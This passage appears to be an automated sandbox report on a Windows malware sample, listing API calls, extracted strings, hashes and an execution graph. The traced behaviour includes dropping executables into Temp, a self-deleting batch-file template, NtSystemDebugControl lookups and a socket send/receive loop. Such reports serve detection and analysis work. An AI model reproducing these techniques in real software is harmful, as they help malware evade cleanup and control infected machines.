                                    • Part of subcall function 00E61973: CopyFileA.KERNEL32(?,?,00000000), ref: 00E61A00
                                    • Part of subcall function 00E61973: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00E61A1E
                                    • Part of subcall function 00E61973: GetFileSize.KERNEL32(?,00000000), ref: 00E61A2C
                                    • Part of subcall function 00E61973: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 00E61A46
                                    • Part of subcall function 00E61973: ReadFile.KERNEL32(?,?,00000000,?,00000000), ref: 00E61A65
                                  • DeleteFileA.KERNEL32(?,?,00E64E54,00E64E58), ref: 00E6281A
                                  • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000004,00000000,00000000,?,00E64E54,00E64E58), ref: 00E62832
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.2306818272.0000000000E61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E60000, based on PE: true
                                  • Associated: 00000001.00000002.2306767215.0000000000E60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000001.00000002.2306836184.0000000000E63000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000001.00000002.2306851774.0000000000E64000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000001.00000002.2306878392.0000000000E66000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_e60000_jHYZko.jbxd
                                  Similarity
                                  • API ID: File$wsprintf$Create$CopyPathTimememsetrandsrand$AllocDeleteExistsFolderReadSizeSleepSpecialSystemVirtual
                                  • String ID: %s%.8x.exe$%s%s$%s\%s$C:\Users\user\AppData\Local\Temp\$C:\Windows\system32$\WinRAR\Rar.exe$c_31892.nls
                                  • API String ID: 692489704-613076915
                                  • Opcode ID: faae0474f159db9eb1fde48339b0cb3843f5d9da1936a2a836bf86d24a5d42b3
                                  • Instruction ID: 31fc168266a88ec7c7c0572bdc185c205561753df2e6c23ce17c88c06f588c71
                                  • Opcode Fuzzy Hash: faae0474f159db9eb1fde48339b0cb3843f5d9da1936a2a836bf86d24a5d42b3
                                  • Instruction Fuzzy Hash: 712156F6D803187BD710D7B5BC95FD7776CDB14784F0015A1B645F2092E6709F488A60
                                  APIs
                                    • Part of subcall function 00E6185B: GetSystemTimeAsFileTime.KERNEL32(00E61F92,00000000,?,00000000,?,?,?,00E61F92,?,00000000,00000002), ref: 00E61867
                                    • Part of subcall function 00E6185B: srand.MSVCRT ref: 00E61878
                                    • Part of subcall function 00E6185B: rand.MSVCRT ref: 00E61880
                                    • Part of subcall function 00E6185B: srand.MSVCRT ref: 00E61890
                                    • Part of subcall function 00E6185B: rand.MSVCRT ref: 00E61894
                                  • wsprintfA.USER32 ref: 00E615AA
                                  • wsprintfA.USER32 ref: 00E615C6
                                  • lstrlen.KERNEL32(?), ref: 00E615D2
                                  • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000002,00000000,00000000), ref: 00E615EE
                                  • WriteFile.KERNEL32(00000000,?,00000000,00000001,00000000), ref: 00E61609
                                  • CloseHandle.KERNEL32(00000000), ref: 00E61612
                                  • ShellExecuteA.SHELL32(00000000,open,?,00000000,00000000,00000000), ref: 00E6162D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.2306818272.0000000000E61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E60000, based on PE: true
                                  • Associated: 00000001.00000002.2306767215.0000000000E60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000001.00000002.2306836184.0000000000E63000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000001.00000002.2306851774.0000000000E64000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000001.00000002.2306878392.0000000000E66000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_e60000_jHYZko.jbxd
                                  Similarity
                                  • API ID: File$Timerandsrandwsprintf$CloseCreateExecuteHandleShellSystemWritelstrlen
                                  • String ID: %s%.8x.bat$:DELFILEdel "%s"if exist "%s" goto :DELFILEdel "%s"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\jHYZko.exe$open
                                  • API String ID: 617340118-817547355
                                  • Opcode ID: 1296c1536629b71716ae1bf60a0847e2ea9a117d5efe84b289734f69b1974ddd
                                  • Instruction ID: eadceaac2528c379d2d73d0cb3d800b6a1673fa8e3703c61a8c33c60d668a511
                                  • Opcode Fuzzy Hash: 1296c1536629b71716ae1bf60a0847e2ea9a117d5efe84b289734f69b1974ddd
                                  • Instruction Fuzzy Hash: 1A1154769422287FD76097B5FC89DEB7A6CDF5A790F000091F549F2041EAB09F888BB0
                                  APIs
                                  • GetModuleHandleA.KERNEL32(ntdll.dll,ZwQuerySystemInformation,00000104,?,?,?,?,00E61400), ref: 00E61226
                                  • GetProcAddress.KERNEL32(00000000), ref: 00E6122D
                                  • GetCurrentProcessId.KERNEL32(?,?,?,?,00E61400), ref: 00E6123F
                                  • OpenProcess.KERNEL32(00000400,00000000,00000000,?,?,?,?,00E61400), ref: 00E61250
                                  • VirtualFree.KERNEL32(00000000,00000000,00008000,?,C:\Users\user\AppData\Local\Temp\jHYZko.exe,?,?,?,?,00E61400), ref: 00E6129E
                                  • VirtualAlloc.KERNEL32(00000000,00050000,00003000,00000004,00000001,?,C:\Users\user\AppData\Local\Temp\jHYZko.exe,?,?,?,?,00E61400), ref: 00E612B0
                                  • CloseHandle.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\jHYZko.exe,?,?,?,?,00E61400), ref: 00E612F5
                                  • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,00E61400), ref: 00E6130A
                                  Strings
                                  • C:\Users\user\AppData\Local\Temp\jHYZko.exe, xrefs: 00E61262
                                  • ZwQuerySystemInformation, xrefs: 00E61212
                                  • ntdll.dll, xrefs: 00E61219
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.2306818272.0000000000E61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E60000, based on PE: true
                                  • Associated: 00000001.00000002.2306767215.0000000000E60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000001.00000002.2306836184.0000000000E63000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000001.00000002.2306851774.0000000000E64000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000001.00000002.2306878392.0000000000E66000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_e60000_jHYZko.jbxd
                                  Similarity
                                  • API ID: Virtual$FreeHandleProcess$AddressAllocCloseCurrentModuleOpenProc
                                  • String ID: C:\Users\user\AppData\Local\Temp\jHYZko.exe$ZwQuerySystemInformation$ntdll.dll
                                  • API String ID: 1500695312-2056654010
                                  • Opcode ID: a532be981a840878be62d634ff603b89be40eaefef777354a421800f243ec3d6
                                  • Instruction ID: aaafd656d11adf0c62c9885aecb640595fa6d9db696b09b8f575a7731f539455
                                  • Opcode Fuzzy Hash: a532be981a840878be62d634ff603b89be40eaefef777354a421800f243ec3d6
                                  • Instruction Fuzzy Hash: C6217B70685301AFD3219F65FC08B6BBAA8FB46BC4F180958F545F7250C370D948D7A5
                                  APIs
                                  • memset.MSVCRT ref: 00E618B1
                                  • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000001,0C000000,00000000,00000000,?,?,000007D0,75920F00,75A78400), ref: 00E618D3
                                  • CloseHandle.KERNEL32(I%), ref: 00E618E9
                                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00E618F0
                                  • GetExitCodeProcess.KERNEL32(?,?), ref: 00E61901
                                  • CloseHandle.KERNEL32(?), ref: 00E6190A
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.2306818272.0000000000E61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E60000, based on PE: true
                                  • Associated: 00000001.00000002.2306767215.0000000000E60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000001.00000002.2306836184.0000000000E63000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000001.00000002.2306851774.0000000000E64000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000001.00000002.2306878392.0000000000E66000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_e60000_jHYZko.jbxd
                                  Similarity
                                  • API ID: CloseHandleProcess$CodeCreateExitObjectSingleWaitmemset
                                  • String ID: I%
                                  • API String ID: 876959470-1881045234
                                  • Opcode ID: 1b95e5eb5fea09cf5c3f3deee6c58c92236be7cc748a9e51b68dc46a5cbb1318
                                  • Instruction ID: 619535e0b40d84e3e97f4b350be7a03b0a70813fa9822205a7e12bd94bd1c464
                                  • Opcode Fuzzy Hash: 1b95e5eb5fea09cf5c3f3deee6c58c92236be7cc748a9e51b68dc46a5cbb1318
                                  • Instruction Fuzzy Hash: EB015A72901128BBCB21ABA6EC48DDFBF7DEB857B1F104125FA15B51A0D6714A1CCBA0
                                  APIs
                                  • CreateEventA.KERNEL32(00000000,00000000,00000001,00000000,7591E800,?,?,00E629DB,?,00000001), ref: 00E626A7
                                  • WaitForSingleObject.KERNEL32(00000000,000000FF,7591E800,?,?,00E629DB,?,00000001), ref: 00E626B5
                                  • lstrlen.KERNEL32(?), ref: 00E626C4
                                  • ??2@YAPAXI@Z.MSVCRT ref: 00E626CE
                                  • lstrcpy.KERNEL32(00000004,?), ref: 00E626E3
                                  • lstrcpy.KERNEL32(?,00000004), ref: 00E6271F
                                  • ??3@YAXPAX@Z.MSVCRT ref: 00E6272D
                                  • SetEvent.KERNEL32 ref: 00E6273C
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.2306818272.0000000000E61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E60000, based on PE: true
                                  • Associated: 00000001.00000002.2306767215.0000000000E60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000001.00000002.2306836184.0000000000E63000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000001.00000002.2306851774.0000000000E64000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000001.00000002.2306878392.0000000000E66000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_e60000_jHYZko.jbxd
                                  Similarity
                                  • API ID: Eventlstrcpy$??2@??3@CreateObjectSingleWaitlstrlen
                                  • String ID:
                                  • API String ID: 41106472-0
                                  • Opcode ID: 0d4232b26bee361ae132af79478ed965cc34d6ddfc0ce1144c70bdeeb0e6259c
                                  • Instruction ID: 1bf6d5a5a1ec257a58fd4fe5f30e65206724da160b8b1a74cfd8d0aa021afcfd
                                  • Opcode Fuzzy Hash: 0d4232b26bee361ae132af79478ed965cc34d6ddfc0ce1144c70bdeeb0e6259c
                                  • Instruction Fuzzy Hash: F411E2B5940504EFCB219F26FC48C5B7BA9FB907E0710401AF554BB1A0C7B19D8DCB90
                                  APIs
                                  Strings
                                  • KIPoiuRllOWSSQDJCJcafxYPDYKpqhUXoZXsFUlGivjbYkXyiZCnJgQtyknhmqeRRNDzmWjHdMPGAukbVOHZILTUjtNzTEmfBpruFEgnvQoywOHVSqcLdMxGAABIxzNWvKaLpThMceebstFfwdwrgBrVaCsE, xrefs: 00E61B8A, 00E61B9C, 00E61C15, 00E61C49
                                  • .exe, xrefs: 00E61C57
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.2306818272.0000000000E61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E60000, based on PE: true
                                  • Associated: 00000001.00000002.2306767215.0000000000E60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000001.00000002.2306836184.0000000000E63000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000001.00000002.2306851774.0000000000E64000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000001.00000002.2306878392.0000000000E66000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_e60000_jHYZko.jbxd
                                  Similarity
                                  • API ID: lstrcatmemcpymemsetrandsrand
                                  • String ID: .exe$KIPoiuRllOWSSQDJCJcafxYPDYKpqhUXoZXsFUlGivjbYkXyiZCnJgQtyknhmqeRRNDzmWjHdMPGAukbVOHZILTUjtNzTEmfBpruFEgnvQoywOHVSqcLdMxGAABIxzNWvKaLpThMceebstFfwdwrgBrVaCsE
                                  • API String ID: 122620767-1264552426
                                  • Opcode ID: cd54c75520a5ed17026e47dc37a37aa52248b12a30cbf737dbc1191b330ac0eb
                                  • Instruction ID: e38b0ecf1125781113794699d813d1ce9f943c9a5a8eedfb6b4b4619bf408811
                                  • Opcode Fuzzy Hash: cd54c75520a5ed17026e47dc37a37aa52248b12a30cbf737dbc1191b330ac0eb
                                  • Instruction Fuzzy Hash: 1C216B62EC42D0AED3271336BC50B6F7B84CFE3795F1960D9F9853B1D2D1A409C98260
                                  APIs
                                  • GetModuleHandleA.KERNEL32(ntdll.dll,NtSystemDebugControl,-00000094,-00000094,0000000C,0000000C,00000001), ref: 00E61334
                                  • GetProcAddress.KERNEL32(00000000), ref: 00E6133B
                                  • memset.MSVCRT ref: 00E61359
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.2306818272.0000000000E61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E60000, based on PE: true
                                  • Associated: 00000001.00000002.2306767215.0000000000E60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000001.00000002.2306836184.0000000000E63000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000001.00000002.2306851774.0000000000E64000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000001.00000002.2306878392.0000000000E66000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_e60000_jHYZko.jbxd
                                  Similarity
                                  • API ID: AddressHandleModuleProcmemset
                                  • String ID: NtSystemDebugControl$ntdll.dll
                                  • API String ID: 3137504439-2438149413
                                  • Opcode ID: 3dd7c5cfa071d046aa312a70ebe74d34a1db9909b517e43f05af28822cadd60d
                                  • Instruction ID: 14b43c6575b59afc321a38a1d5b58c221426450a973edb1c3b94536f5237f210
                                  • Opcode Fuzzy Hash: 3dd7c5cfa071d046aa312a70ebe74d34a1db9909b517e43f05af28822cadd60d
                                  • Instruction Fuzzy Hash: 970161716C1309AFDB11DFA5BC8596FBBB8FB42398F04456AF902B1290E2B08609CB51
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.2306818272.0000000000E61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E60000, based on PE: true
                                  • Associated: 00000001.00000002.2306767215.0000000000E60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000001.00000002.2306836184.0000000000E63000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000001.00000002.2306851774.0000000000E64000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000001.00000002.2306878392.0000000000E66000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_e60000_jHYZko.jbxd
                                  Similarity
                                  • API ID: strrchr$lstrcmpilstrcpylstrlen
                                  • String ID:
                                  • API String ID: 3636361484-0
                                  • Opcode ID: 38f01dc63af5c91bc2822fb46f505e1dde63c68500418e34dc3b73cbf3bf005d
                                  • Instruction ID: ac315ace242763dfac3e0128bfab00f1bb1dd9e0a48c1e2b57c297e8f292b107
                                  • Opcode Fuzzy Hash: 38f01dc63af5c91bc2822fb46f505e1dde63c68500418e34dc3b73cbf3bf005d
                                  • Instruction Fuzzy Hash: B901D6B29442196FEB215770FC49BD7779CDB143D5F0810A6EA45F2090EAB4DA888BE0
                                  APIs
                                  • GetSystemTimeAsFileTime.KERNEL32(00E61F92,00000000,?,00000000,?,?,?,00E61F92,?,00000000,00000002), ref: 00E61867
                                  • srand.MSVCRT ref: 00E61878
                                  • rand.MSVCRT ref: 00E61880
                                  • srand.MSVCRT ref: 00E61890
                                  • rand.MSVCRT ref: 00E61894
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.2306818272.0000000000E61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E60000, based on PE: true
                                  • Associated: 00000001.00000002.2306767215.0000000000E60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000001.00000002.2306836184.0000000000E63000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000001.00000002.2306851774.0000000000E64000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000001.00000002.2306878392.0000000000E66000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_e60000_jHYZko.jbxd
                                  Similarity
                                  • API ID: Timerandsrand$FileSystem
                                  • String ID:
                                  • API String ID: 4106363736-0
                                  • Opcode ID: b3826adc42e9b119a13041fff5192c6b13e27e363026643709491c80efa3812f
                                  • Instruction ID: 0c811763ffc3bd2470cf0bc04fe6458c41d1ce061847092d8d1968bf3f66c041
                                  • Opcode Fuzzy Hash: b3826adc42e9b119a13041fff5192c6b13e27e363026643709491c80efa3812f
                                  • Instruction Fuzzy Hash: 3BE01B779102187FD74057BAFC4699FB7ACDF441617110566F500E3154E5B4E9488674

                                  Execution Graph

                                  Execution Coverage:2.7%
                                  Dynamic/Decrypted Code Coverage:1%
                                  Signature Coverage:0%
                                  Total number of Nodes:395
                                  Total number of Limit Nodes:26
                                  execution_graph 23227 65a867 49 API calls ___std_exception_copy 22702 656ba6 22703 656bb9 ___std_exception_copy 22702->22703 22708 6568fd 22703->22708 22707 656bdb 22710 656909 std::locale::_Setgloballocale 22708->22710 22709 65690f 22730 652193 39 API calls 2 library calls 22709->22730 22710->22709 22713 656952 22710->22713 22712 65692a 22719 651f4c 39 API calls ___std_exception_copy 22712->22719 22720 65a800 RtlEnterCriticalSection 22713->22720 22715 65695e 22721 656a80 22715->22721 22717 656974 22731 65699d RtlLeaveCriticalSection 22717->22731 22719->22707 22720->22715 22722 656aa6 22721->22722 22723 656a93 22721->22723 22732 6569a7 22722->22732 22723->22717 22725 656b57 22725->22717 22726 656ac9 22726->22725 22736 653041 22726->22736 22730->22712 22731->22712 22733 656a10 22732->22733 22734 6569b8 22732->22734 22733->22726 22734->22733 22745 65bbad 41 API calls ___std_exception_copy 22734->22745 22737 65305a 22736->22737 22741 653081 22736->22741 22737->22741 22746 6639f2 22737->22746 22739 653076 22753 662dfb 22739->22753 22742 65bbed 22741->22742 22823 65bacc 22742->22823 22744 65bc06 22744->22725 22745->22733 22747 663a13 22746->22747 22748 6639fe 22746->22748 22747->22739 22764 65acaf 14 API calls __dosmaperr 22748->22764 22750 663a03 22765 652210 39 API calls ___std_exception_copy 22750->22765 22752 663a0e 22752->22739 22754 662e07 std::locale::_Setgloballocale 22753->22754 22755 662e48 22754->22755 22757 662e8e 22754->22757 22763 662e0f 22754->22763 22795 652193 39 API calls 2 library calls 22755->22795 22766 667ed2 RtlEnterCriticalSection 22757->22766 22759 662e94 22760 662eb2 22759->22760 22767 662f0c 22759->22767 22796 662f04 RtlLeaveCriticalSection 22760->22796 22763->22741 22764->22750 22765->22752 22766->22759 22768 662f34 22767->22768 22791 662f57 22767->22791 22769 662f38 22768->22769 22771 662f93 22768->22771 22804 652193 39 API calls 2 library calls 22769->22804 22772 662fb1 22771->22772 22773 65bbed 41 API calls 22771->22773 22797 662a51 22772->22797 22773->22772 22776 663010 22778 663024 22776->22778 22779 663079 WriteFile 22776->22779 22777 662fc9 22780 662fd1 22777->22780 22781 662ff8 22777->22781 22784 663065 22778->22784 22785 66302c 22778->22785 22782 66309b GetLastError 22779->22782 22779->22791 22780->22791 22805 6629e9 6 API calls 22780->22805 22806 662622 53 API calls 3 library calls 22781->22806 22782->22791 22809 662ace 7 API calls _ValidateLocalCookies 22784->22809 22788 663051 22785->22788 22789 663031 22785->22789 22808 662c92 8 API calls 2 library calls 22788->22808 22789->22791 22793 66303a 22789->22793 22791->22760 22792 66300b 22792->22791 22807 662ba9 7 API calls _ValidateLocalCookies 22793->22807 22795->22763 22796->22763 22810 66e7b4 22797->22810 22799 662a63 22800 662ac7 22799->22800 22801 662a91 22799->22801 22819 657780 49 API calls 2 library calls 22799->22819 22800->22776 22800->22777 22801->22800 22803 662aab GetConsoleMode 22801->22803 22803->22800 22804->22791 22805->22791 22806->22792 22807->22791 22808->22792 22809->22792 22811 66e7c1 22810->22811 22812 66e7ce 22810->22812 22820 65acaf 14 API calls __dosmaperr 22811->22820 22815 66e7da 22812->22815 22821 65acaf 14 API calls __dosmaperr 22812->22821 22814 66e7c6 22814->22799 22815->22799 22817 66e7fb 22822 652210 39 API calls ___std_exception_copy 22817->22822 22819->22801 22820->22814 22821->22817 22822->22814 22829 66814e 22823->22829 22825 65bade 22826 65bafa SetFilePointerEx 22825->22826 22827 65bae6 22825->22827 22826->22827 22828 65bb12 GetLastError 22826->22828 22827->22744 22828->22827 22830 668170 22829->22830 22831 66815b 22829->22831 22836 668195 22830->22836 22844 65ac9c 14 API calls __dosmaperr 22830->22844 22842 65ac9c 14 API calls __dosmaperr 22831->22842 22833 668160 22843 65acaf 14 API calls __dosmaperr 22833->22843 22836->22825 22837 6681a0 22845 65acaf 14 API calls __dosmaperr 22837->22845 22838 668168 22838->22825 22840 6681a8 22846 652210 39 API calls ___std_exception_copy 22840->22846 22842->22833 22843->22838 22844->22837 22845->22840 22846->22838 23245 829bc4 LoadStringA 23254 66d1e1 50 API calls 3 library calls 23044 109a000 23046 109a044 GetPEB 23044->23046 23048 109a077 CreateFileA 23046->23048 23049 109a22d 23048->23049 23258 5da190 52 API calls 23224 829b8c 23225 829b99 VirtualAlloc 23224->23225 23229 5eca10 39 API calls 23246 66d930 50 API calls 3 library calls 23240 572540 51 API calls std::locale::_Locimp::_Locimp 23247 578b00 41 API calls ___std_exception_copy 23248 58a100 196 API calls 3 library calls 23249 653b3f 11 API calls 23232 64bcf9 9 API calls 3 library calls 23235 650880 20 API calls 4 library calls 23236 584ab0 43 API calls std::locale::_Setgloballocale 23243 66db48 53 API calls 3 library calls 22847 652dd0 22850 652d0e 22847->22850 22853 652d1a std::locale::_Setgloballocale 22850->22853 22851 652d21 22875 65acaf 14 API calls __dosmaperr 22851->22875 22853->22851 22855 652d41 22853->22855 22854 652d26 22876 652210 39 API calls ___std_exception_copy 22854->22876 22857 652d46 22855->22857 22858 652d53 22855->22858 22877 65acaf 14 API calls __dosmaperr 22857->22877 22867 6640f8 22858->22867 22862 652d63 22878 65acaf 14 API calls __dosmaperr 22862->22878 22864 652d70 22879 652dae RtlLeaveCriticalSection 22864->22879 22866 652d31 22868 664104 std::locale::_Setgloballocale 22867->22868 22880 65d777 RtlEnterCriticalSection 22868->22880 22870 664112 22881 66419c 22870->22881 22875->22854 22876->22866 22877->22866 22878->22866 22879->22866 22880->22870 22888 6641bf 22881->22888 22882 66411f 22894 664158 22882->22894 22883 664217 22899 663e63 22883->22899 22888->22882 22888->22883 22897 65a800 RtlEnterCriticalSection 22888->22897 22898 65a814 RtlLeaveCriticalSection 22888->22898 22889 664229 22889->22882 22907 664ffd 6 API calls std::_Lockit::_Lockit 22889->22907 22891 664248 22908 65a800 RtlEnterCriticalSection 22891->22908 22911 65d7bf RtlLeaveCriticalSection 22894->22911 22896 652d5c 22896->22862 22896->22864 22897->22888 22898->22888 22905 663e70 __dosmaperr 22899->22905 22900 663eb0 22910 65acaf 14 API calls __dosmaperr 22900->22910 22901 663e9b RtlAllocateHeap 22902 663eae 22901->22902 22901->22905 22906 664823 14 API calls __dosmaperr 22902->22906 22905->22900 22905->22901 22909 65f248 RtlEnterCriticalSection RtlLeaveCriticalSection std::_Facet_Register 22905->22909 22906->22889 22907->22891 22908->22882 22909->22905 22910->22902 22911->22896 23256 6519d0 5 API calls _ValidateLocalCookies 22912 58ec20 22913 58f0bf 22912->22913 22921 58ec5e 22912->22921 22914 58eca7 setsockopt recv WSAGetLastError 22914->22913 22914->22921 22916 58ecff 22961 5d8610 22916->22961 22918 58f0aa Sleep 22918->22913 22918->22921 22920 58f09c Sleep 22920->22918 22921->22914 22921->22916 22921->22918 22921->22920 22930 58db60 WSAStartup 22921->22930 22943 584a90 22921->22943 22946 58e060 22921->22946 22922 58ed38 recv 22923 58ed59 recv 22922->22923 22929 58ed7a 22922->22929 22923->22929 22925 5d8610 41 API calls 22927 58edc1 setsockopt recv 22925->22927 22927->22929 22929->22920 22929->22925 22966 5d5d50 22929->22966 22983 58e460 81 API calls 22929->22983 22931 58dc66 22930->22931 22933 58db98 22930->22933 22931->22921 22932 58dbce getaddrinfo 22934 58dc60 WSACleanup 22932->22934 22935 58dc16 22932->22935 22933->22931 22933->22932 22934->22931 22936 58dc74 FreeAddrInfoW 22935->22936 22938 58dc24 socket 22935->22938 22936->22934 22937 58dc80 22936->22937 22937->22921 22938->22934 22939 58dc3a connect 22938->22939 22940 58dc4c closesocket 22939->22940 22941 58dc70 22939->22941 22940->22938 22942 58dc56 FreeAddrInfoW 22940->22942 22941->22936 22942->22934 22984 64c6dc 22943->22984 22945 584a9b __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 22945->22921 22947 5d5d50 41 API calls 22946->22947 22949 58e0aa 22947->22949 22992 5d5bd0 22949->22992 22950 58e204 22951 58e44b 22950->22951 22952 58e22e 22950->22952 22997 652220 39 API calls 2 library calls 22951->22997 22954 5d8610 41 API calls 22952->22954 22957 58e26e std::locale::_Locimp::_Locimp 22952->22957 22954->22957 22957->22957 22958 58e37d GetModuleHandleA GetProcAddress WSASend 22957->22958 22959 58e3b7 22957->22959 22958->22957 22958->22959 22960 58e423 22959->22960 22998 652220 39 API calls 2 library calls 22959->22998 22960->22921 22962 5d8657 22961->22962 22965 5d8628 std::locale::_Setgloballocale 22961->22965 23000 5dba20 22962->23000 22964 5d866a 22964->22922 22965->22922 22967 5d5d7a 22966->22967 22968 5d5d8b 22967->22968 22969 5d5e32 22967->22969 22971 5d5d97 std::locale::_Locimp::_Locimp 22968->22971 22972 5d5dbc 22968->22972 22975 5d5dfe 22968->22975 22976 5d5df5 22968->22976 23041 572040 41 API calls std::locale::_Setgloballocale 22969->23041 22971->22929 22977 64cd02 std::_Facet_Register 41 API calls 22972->22977 22973 5d5e37 23042 571fa0 41 API calls 2 library calls 22973->23042 22980 64cd02 std::_Facet_Register 41 API calls 22975->22980 22981 5d5dd6 std::locale::_Locimp::_Locimp 22975->22981 22976->22972 22976->22973 22978 5d5dcf 22977->22978 22978->22981 23043 652220 39 API calls 2 library calls 22978->23043 22980->22981 22981->22929 22983->22929 22987 64ccdc 22984->22987 22988 64cced GetSystemTimePreciseAsFileTime 22987->22988 22989 64ccf9 GetSystemTimeAsFileTime 22987->22989 22990 64c6ea 22988->22990 22989->22990 22990->22945 22993 5d5c01 22992->22993 22994 5d5bde 22992->22994 22993->22950 22994->22993 22999 652220 39 API calls 2 library calls 22994->22999 23001 5dbb6c 23000->23001 23002 5dba45 23000->23002 23026 572040 41 API calls std::locale::_Setgloballocale 23001->23026 23006 5dbaa6 23002->23006 23007 5dbab3 23002->23007 23009 5dba5a 23002->23009 23004 5dbb71 23027 571fa0 41 API calls 2 library calls 23004->23027 23006->23004 23006->23009 23011 64cd02 std::_Facet_Register 41 API calls 23007->23011 23013 5dba6a std::locale::_Locimp::_Locimp std::locale::_Setgloballocale 23007->23013 23015 64cd02 23009->23015 23011->23013 23014 5dbb2a std::locale::_Locimp::_Locimp std::locale::_Setgloballocale 23013->23014 23028 652220 39 API calls 2 library calls 23013->23028 23014->22964 23017 64cd07 23015->23017 23018 64cd21 23017->23018 23021 571fa0 Concurrency::cancel_current_task 23017->23021 23031 65f248 RtlEnterCriticalSection RtlLeaveCriticalSection std::_Facet_Register 23017->23031 23032 65b99c 23017->23032 23018->23013 23020 64cd2d 23020->23020 23021->23020 23029 64e96b RaiseException 23021->23029 23023 571fbc 23030 64e0c1 40 API calls ___std_exception_copy 23023->23030 23025 571fe3 23025->23013 23026->23004 23027->23013 23029->23023 23030->23025 23031->23017 23037 66489d __dosmaperr 23032->23037 23033 6648db 23040 65acaf 14 API calls __dosmaperr 23033->23040 23035 6648c6 RtlAllocateHeap 23036 6648d9 23035->23036 23035->23037 23036->23017 23037->23033 23037->23035 23039 65f248 RtlEnterCriticalSection RtlLeaveCriticalSection std::_Facet_Register 23037->23039 23039->23037 23040->23036 23041->22973 23042->22978 23050 66379c GetLastError 23051 6637b2 23050->23051 23052 6637b8 23050->23052 23078 664e65 6 API calls std::_Lockit::_Lockit 23051->23078 23056 6637bc SetLastError 23052->23056 23073 664ea4 23052->23073 23058 663e63 __dosmaperr 12 API calls 23059 6637e9 23058->23059 23060 663802 23059->23060 23061 6637f1 23059->23061 23063 664ea4 __dosmaperr 6 API calls 23060->23063 23062 664ea4 __dosmaperr 6 API calls 23061->23062 23064 6637ff 23062->23064 23065 66380e 23063->23065 23079 664823 14 API calls __dosmaperr 23064->23079 23066 663812 23065->23066 23067 663829 23065->23067 23069 664ea4 __dosmaperr 6 API calls 23066->23069 23080 663479 14 API calls __dosmaperr 23067->23080 23069->23064 23071 663834 23081 664823 14 API calls __dosmaperr 